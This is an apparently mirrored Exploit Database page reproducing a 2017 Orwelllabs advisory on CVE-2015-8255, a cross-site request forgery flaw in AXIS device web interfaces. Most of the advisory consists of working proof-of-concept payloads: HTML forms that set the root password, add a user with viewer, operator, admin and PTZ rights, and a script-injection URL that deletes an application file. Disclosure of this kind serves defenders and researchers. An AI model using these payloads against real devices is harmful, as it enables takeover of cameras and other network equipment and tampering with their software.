AXIS (Multiple Products) – Cross-Site Request Forgery

• Exploit Database
• 113 阅读

• 作者： Orwelllabs
  日期： 2017-03-17
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/41626/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104

  0RWELLL4BS ********** security advisory olsa-CVE-2015-8255 PGP: 79A6CCC0 @orwelllabs         Advisory Information ==================== - Title: Cross-Site Request Forgery - Vendor: AXIS Communications - Research and Advisory: Orwelllabs - Class: Session Management control [CWE-352] - CVE Name: CVE-2015-8255 - Affected Versions: - IoT Attack Surface: Device Web Interface - OWASP IoTTop10: I1       Technical Details ================= Because of the own (bad) design of this kind of device (Actualy a big problem of IoT, one of them) The embedded web application does not verify whether a valid request was intentionally provided by the user who submitted the request.       PoCs ==== #-> Setting root password to W!nst0n   <html> <!-- CSRF PoCOrwelllabs --> <body> <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi"> <input type="hidden" name="action" value="update" /> <input type="hidden" name="user" value="root" /> <input type="hidden" name="pwd" value="w!nst0n" /> <input type="hidden" name="comment" value="Administrator" /> <input type="submit" value="Submit request" /> </form> </body> </html>     #-> Adding new credential SmithW:W!nst0n   <html> <!-- CSRF PoC - Orwelllabs --> <body> <form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi"> <input type="hidden" name="action" value="add" /> <input type="hidden" name="user" value="SmithW" /> <input type="hidden" name="sgrp" value="viewer&#58;operator&#58;admin&#58;ptz" /> <input type="hidden" name="pwd" value="W!nst0n" /> <input type="hidden" name="grp" value="users" /> <input type="hidden" name="comment" value="WebUser" /> <input type="submit" value="Submit request" /> </form> </body> </html>     #-> Deleting an app via directly CSRF (axis_update.shtml)   http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="https://www.exploit-db.com/exploits/41626/ http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml "></script>     [And many acitions allowed to an user [all of them?] can be forged in this way]     Vendor Information, Solutions and Workarounds +++++++++++++++++++++++++++++++++++++++++++++ Well, this is a very old design problem of this kind of device, nothing new to say about that.     Credits ======= These vulnerabilities has been discovered and published by Orwelllabs.     Legal Notices ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. We accept no responsibility for any damage caused by the use or misuse of this information.     About Orwelllabs ================ https://www.exploit-db.com/author/?a=8225 https://packetstormsecurity.com/files/author/12322/